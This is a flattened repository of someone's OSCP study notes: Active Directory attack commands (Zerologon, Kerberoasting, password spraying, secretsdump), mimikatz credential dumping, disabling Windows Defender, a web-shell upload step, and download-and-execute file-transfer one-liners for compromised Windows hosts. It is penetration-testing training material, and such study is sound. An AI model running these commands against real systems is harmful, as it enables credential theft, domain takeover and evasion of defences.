├── Active Directory └── AD.md ├── Bash-Aliases └── bash_aliases.sh ├── Misc ├── Cheatsheets.md └── Misc.md ├── README.md ├── Recon └── Recon.md └── Transferring Files ├── transferring from windows.md └── transferring to windows.md /Active Directory/AD.md: -------------------------------------------------------------------------------- 1 | ## HackTheBox AD machines 2 | Do the following machines and watch ippsec's videos on them 3 | - monteverde 4 | - cascade 5 | - traversex 6 | - fuse 7 | - intelligence 8 | - remote 9 | - resolute 10 | - sizzle 11 | - multimaster 12 | - sauna 13 | - forest 14 | - object 15 | - active 16 | 17 | # Enumeration 18 | 19 | ## RPC 20 | RPC Null Authentication: `rpcclient -U '' ` 21 | 22 | RPC Null Authentication with no password: `rpcclient -U '' ` 23 | 24 | If you are able to log in, run `enumdomusers` to list out users 25 | 26 | If you get a list of users, you can check their descriptions with the following command: 27 | 28 | `querydispinfo` 29 | 30 | ## SMTP 31 | `nmap -v --script="smtp*" -p25,110,143,465,587,993,995 ` 32 | 33 | ## SMB 34 | `crackmapexec smb --shares` 35 | 36 | `crackmapexec smb -u '' -p '' --shares` 37 | 38 | `crackmapexec smb -u '' --shares` 39 | 40 | `crackmapexec smb --pass-pol` 41 | 42 | `crackmapexec smb --users` 43 | 44 | `smbmap -H ` 45 | 46 | `smbclient -L //` 47 | 48 | `smbclient --no-pass /// -U''` 49 | 50 | ## LDAP 51 | git clone windapsearch by ropnop if you don’t already have it 52 | 53 | `python [windapsearch.py](http://windapsearch.py) -U --full --dc-ip ` 54 | 55 | - pipe this out to a tmp file and use the following command to sort. once sorted, look for interesting strings such as `password` or `pwd` 56 | - `cat tmp | awk '{print $1}' | sort | uniq -c | sort -nr | grep ':'` 57 | - YOU SHOULD THEN `grep -i` FOR: 58 | - `pass` 59 | - `pwd` 60 | - `password` 61 | - `etc` 62 | 63 | ### Hosting a Rogue LDAP Server 64 | 65 | Install the following packages`apt-get install slapd ldap-utils` 66 | 67 | Enable package on boot with`systemctl enable slapd` 68 | 69 | Configure server to make it insecure with `dpkg` 70 | 71 | - `dpkg-reconfigure -p low slapd` 72 | - When prompted, select `No` 73 | - provide the target domain eg `hiddenleaf.local` 74 | - use the same domain as the organization name 75 | - provide an admin password eg `admin123` 76 | - select `MDB` as the database to use 77 | - select `yes` for the database to be removed when slapd in purged 78 | - `yes` to move old database 79 | 80 | To allow credentials to be shown in clear text we have to downgrade the authentication methods. Create an ldif file called `olcSaslSecProps.ldif`: 81 | 82 | ``` 83 | #olcSaslSecProps.ldif 84 | dn: cn=config 85 | replace: olcSaslSecProps 86 | olcSaslSecProps: noanonymous,minssf=0,passcred 87 | ``` 88 | 89 | Use the file to patch the LDAP server: 90 | 91 | - `sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif` 92 | - `systemctl restart slapd` or `service slapd restart` 93 | 94 | Now listen using tcpdump: 95 | 96 | `sudo tcpdump -SX -i eth0 tcp port 389` 97 | 98 | It might take a few tries before you receive anything if you running over a vpn 99 | 100 | ## Zero Logon 101 | 102 | *Do not run this is a production environment as this may break the domain controller* 103 | 104 | git clone the github repo for `CVE-2020-1472` by dirkjanm and then download the `zero-logon tester` script for the same CVE by SecuraBV 105 | 106 | run the tester script with the following syntax: 107 | 108 | - `python3 [zerologontester.py](http://zerologontester.py) ` 109 | 110 | if the script confirms the vulnerability, we can use secretsdump to dump the NTDS.DIT file: 111 | 112 | - `impacket-secretsdump /\$@ -just-dc` 113 | - the `$` presents an empty value/string 114 | 115 | # If you have a Valid User(s) and or Password(s): 116 | 117 | - `python3 [bloodhound.py](http://bloodhound.py) -ns -d -dc -u -p -c All` 118 | 119 | - `rpcclient -U '' ` then run `enumdomusers` with this you can try `GetUserSPNs` or `GetNPUsers` 120 | 121 | - *NO PASS REQ* `./kerbrute userenum -dc -d users.txt` 122 | - if this command does not run (fails) try sync your attack machine time with the time of the domain controller because kerberos authentication requires that the times be synced: 123 | - `ntpdate ` 124 | 125 | - `./kerbrute passwordspray --dc -d users.txt ` 126 | - if this command does not run (fails) try sync your attack machine time with the time of the domain controller because kerberos authentication requires that the times be synced: 127 | - `ntpdate ` 128 | 129 | - `impacket-GetUserSPNs /: -outputfile krbroast` 130 | 131 | - *NO PASS REQ* `impacket-GetNPUsers -dc-ip -no-pass -usersfile users.txt /` OR `impacket-GetNPUsers -dc-ip -no-pass /` 132 | 133 | - `crackmapexec smb smb/winrm - u -p --no-bruteforce --continue-on-success` 134 | 135 | - `crackmapexec smb -u -p --shares -M spider_plus` 136 | 137 | - `crackmapexec smb -u -p -M spider_plus` 138 | - to list out the contents of the spider plus module, you have to use `jq` to parse the data. to list everything in all the found shares run `cat /tmp/cme_spider_plus/.json | jq '. | map_values(keys)'` 139 | 140 | ## Misc 141 | 142 | ### Change User Pass with `rpcclient` 143 | If your current user has the `ForceChangePass` flag on another user which you can find in bloodhound, you can use rpcclient to change the password then maybe read shares with smbclient/cme or do more enumeration with the new user and password 144 | be sure to try a password that might fit in a password policy 145 | 146 | - `rpcclient -U ` 147 | 148 | - `setuserinfo2 23 ''` 149 | 150 | ### Change User Pass with `smbpasswd` 151 | `smbpasswd -U -r ` 152 | 153 | ### Mount SMB Share 154 | `sudo mount -t cifs -o 'username=,password=' /// /mnt/` 155 | 156 | ### Cracking GPP Password/Hash 157 | this is some sort of cpassword or something 158 | 159 | `gpp-decrypt ` 160 | 161 | # AD Enumeration (Post Compromise) 162 | 163 | ### Powerview 164 | 165 | Quick Commands: 166 | 167 | - `Get-NetDomain` 168 | 169 | - `Get-NetDomainController` 170 | 171 | - `Get-DomainPolicy` 172 | 173 | - `(Get-DomainPolicy)."system access"` 174 | 175 | - `Get-NetUser | select eg select cn, description` 176 | 177 | - `Get-userProperty -Properties pwdlastset` 178 | 179 | - `Get -UserProperty -Properties logoncount` : don't attack accounts with low logoncount because they might be honeypot account. As soon as you compromise it, the security team will be alerted of your presence. 180 | 181 | You can find a whole powerview cheatsheet here: [https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) 182 | 183 | ### Bloodhound 184 | 185 | 1. Connect to the database by running: `sudo neo4j console` 186 | 2. run `bloodhound` in new tab 187 | 3. Transfer the SharpHound.ps1 script to the victim machine and invoke powershell using `powershell -ep bypass` 188 | 4. Import the module: `. .\SharpHound.ps1` 189 | 5. Collect the data: `Invoke-BloodHound -CollectionMethod All -Domain SCRIPTKIDDIEHUB -ZipFileName tadi.zip` 190 | 191 | or use `SharpHound.exe -c All` 192 | 193 | Transfer the zip file to your attacker machine and upload it to bloodhound where it will put it all in graphs -------------------------------------------------------------------------------- /Bash-Aliases/bash_aliases.sh: -------------------------------------------------------------------------------- 1 | alias venv='virtualenv -p python2.7 venv' # creating python 2 virtual env 2 | alias actv='source /home/kali/venv/bin/activate' # activate a created virtual env 3 | alias server='sudo python3 -m http.server 80' # static web server 4 | alias ghidra='python3 /home/kali/tools/ghidra-auto/ghidra.py' #open ghidra with one command - Not necessarily useful for OSCP 5 | alias pwdcp='pwd | xclip -selection clipboard' # copy path of current working directory 6 | 7 | # Port Scanning 8 | # Rustscan combined with Nmap using a bash alias for all ports 9 | # Usage: `rusty ` 10 | rusty() { 11 | IP=$1 12 | /home/kali/.cargo/bin/rustscan -a "$IP" -- -A -v -oN $PWD/nmapinit 13 | } 14 | 15 | 16 | # SMB Enum 17 | # Nmap and Enum4linuxng using a bash alias. This creates a directory called Enum in the current working directory. 18 | # Usage: `win-enum ` 19 | win-enum() { 20 | IP=$1 21 | echo "Starting SMB Enum Script..." 22 | mkdir -p enum 23 | nmap --script "smb-vuln*" -p139,445 -oN $PWD/enum/nmap-smb-enum "$IP" 24 | 25 | echo "Starting SMB Vuln Scritps..." 26 | nmap --script "smb-enum*" -p139,445 -oN $PWD/enum/nmap-smb-vuln "$IP" 27 | 28 | echo "Starting Enum4Linux..." 29 | /home/kali/tools/enum4linux-ng/enum4linux-ng.py -A "$IP" -oY $PWD/enum/enum4l 30 | } 31 | 32 | 33 | # netcat reverse shell 34 | # Usage: rev 35 | rusty() { 36 | IP=$1 37 | /home/kali/.cargo/bin/rustscan -a "$IP" -- -A -v -oN $PWD/nmapinit 38 | } -------------------------------------------------------------------------------- /Misc/Cheatsheets.md: -------------------------------------------------------------------------------- 1 | # SQL Injection Cheatsheets 2 | - Portswigger: https://portswigger.net/web-security/sql-injection/cheat-sheet 3 | 4 | - Pentester Monkey: https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet 5 | 6 | - Perstertiverisk MySQL: https://perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/ 7 | 8 | - Perspectiverisk MSSQL: https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/ 9 | 10 | # Windows Priv Esc 11 | - Hacktricks: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation 12 | 13 | # Linux Priv Esc 14 | - Hacktricks: https://book.hacktricks.xyz/linux-hardening/privilege-escalation -------------------------------------------------------------------------------- /Misc/Misc.md: -------------------------------------------------------------------------------- 1 | # Cracking zip file 2 | - `fcrackzip -v -u -D -p ` 3 | 4 | # Mimikatz 5 | `mimi.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"` 6 | 7 | # Downloading from SMBClient 8 | - turn prompt off using `prompt off` 9 | - `recurse on` 10 | - `mget *` 11 | 12 | # Pulling down mssql NTLMv2 hash 13 | start an smbserver and in the mssql console run `exec xp_dirtree '\\\\',1,1` then check the smb server for the hash 14 | 15 | # SMBClient 16 | List shares: `smbclient -L \\\\\\` 17 | 18 | Connect without a password: `smbclient --no-pass -N ///Backups` 19 | 20 | # Mount remote share 21 | `sudo apt install libguestfs-tools` 22 | 23 | `sudo apt install cifs-utils` 24 | 25 | `sudo mkdir /mnt/remote` 26 | 27 | `mount -t cifs ///Backups /mnt/remote -o rw` 28 | 29 | # SMBClient to shell 30 | If you are able to access a share you can write to and that share is for a website then you can get a shell by uploading `nc.exe` to the share as well as a malicious `php` file with the following code: 31 | 32 | ```php 33 | 34 | ``` 35 | 36 | Go to the website and navigate to the `php` file while you have a listener running 37 | 38 | # Run command as different user 39 | `sudo -u 'command'` 40 | 41 | # Extract/open .img file 42 | `binwalk -e <.img FILE>` 43 | 44 | # Old SSH exchange key bruteforce 45 | For old linux distributions and boxes, bruteforcing SSH with hydra might not work because of the key exchange limitations 46 | 47 | You can use a tool called `Patator` with the following syntax 48 | 49 | - `patator ssh_login host= port = user= password=FILE0 0= persistent=0` 50 | 51 | # Matching key exchange 52 | `ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss` 53 | 54 | # MSSQL 55 | login it to mssql remotely 56 | 57 | `sqsh -S -U sa -P ` 58 | 59 | # Disable windefend if nt\authority 60 | `powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true -Verbose"` -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCP-Notes 2 | Most of the notes, resources and scripts I used to prepare for the OSCP and pass it the first time. 3 | 4 | There are a bunch of sections in these notes, some sections have their own folders and all, just look around. 5 | 6 | The Repo isn't complete yet, I will continue to update it regularly. -------------------------------------------------------------------------------- /Recon/Recon.md: -------------------------------------------------------------------------------- 1 | # Directory Bruteforcing 2 | 3 | ## Gobuster 4 | - `gobuster dir -u http://"$IP"/ -w /usr/share/wordlists/dirb/common.txt --no-error -o $PWD/enum/gobustergob-common -x asp,php` 5 | 6 | - `gobuster dir -u http://"$IP"/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt --no-error -o $PWD/enum/gobustergob-raft-small-words -x asp,php` 7 | 8 | - `gobuster dir -u http://"$IP"/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --no-error -o $PWD/enum/gobuster/gob-directory-small -x asp,php` 9 | 10 | ## DirSearch 11 | `dirsearch -u http:/// --exclude-status=300,400-499,500-599 -o dirsearch` 12 | 13 | # SubDomain Enum 14 | `wfuzz -c -f sub-finder -w -u '' -H "Host: FUZZ.cmess.thm" --hw ` 15 | 16 | # Hidden Parameter Fuzzing 17 | `wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hh ` 18 | 19 | # LFI 20 | `wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hh ` -------------------------------------------------------------------------------- /Transferring Files/transferring from windows.md: -------------------------------------------------------------------------------- 1 | ## FTP Server 2 | Host ftp server on your kali machine: `python3 -m pyftpdlib -p 21 --write` 3 | 4 | Now using ftp on the compromised windows machine connect to your ftp server using anonymous access: `ftp ` 5 | 6 | Remember to use `binary` mode when transferring files. 7 | 8 | ## SMB Server 9 | `impacket-smbserver tadi .` 10 | 11 | - use `-smb2support` if machine is running smb version 2 12 | 13 | on the windows machine run `net use \\\tadi` 14 | 15 | you can copy from windows machine using: `copy C:\bank-account.zip Z:\bank-account.zip` or cd into `Z:\` then `copy C: .` 16 | 17 | `Z:\` would be the name of the share that you opened 18 | 19 | ## PHP Server 20 | If php is installed on the windows client, host a server and connect to it from your kali machine 21 | 22 | `php -S 0.0.0.0:` -------------------------------------------------------------------------------- /Transferring Files/transferring to windows.md: -------------------------------------------------------------------------------- 1 | Transferring files to the compromised windows machine: 2 | 3 | - `curl -o http://` 4 | - `certutil.exe -urlcache -f http:/// ` 5 | - `iex(new-object net.webclient).downloadstring('http:///')` 6 | 7 | Using winrm 8 | `upload ` for example `upload /home/kali/tools/winpeas.exe C:\\users\\tadi\\winpeas.exe` --------------------------------------------------------------------------------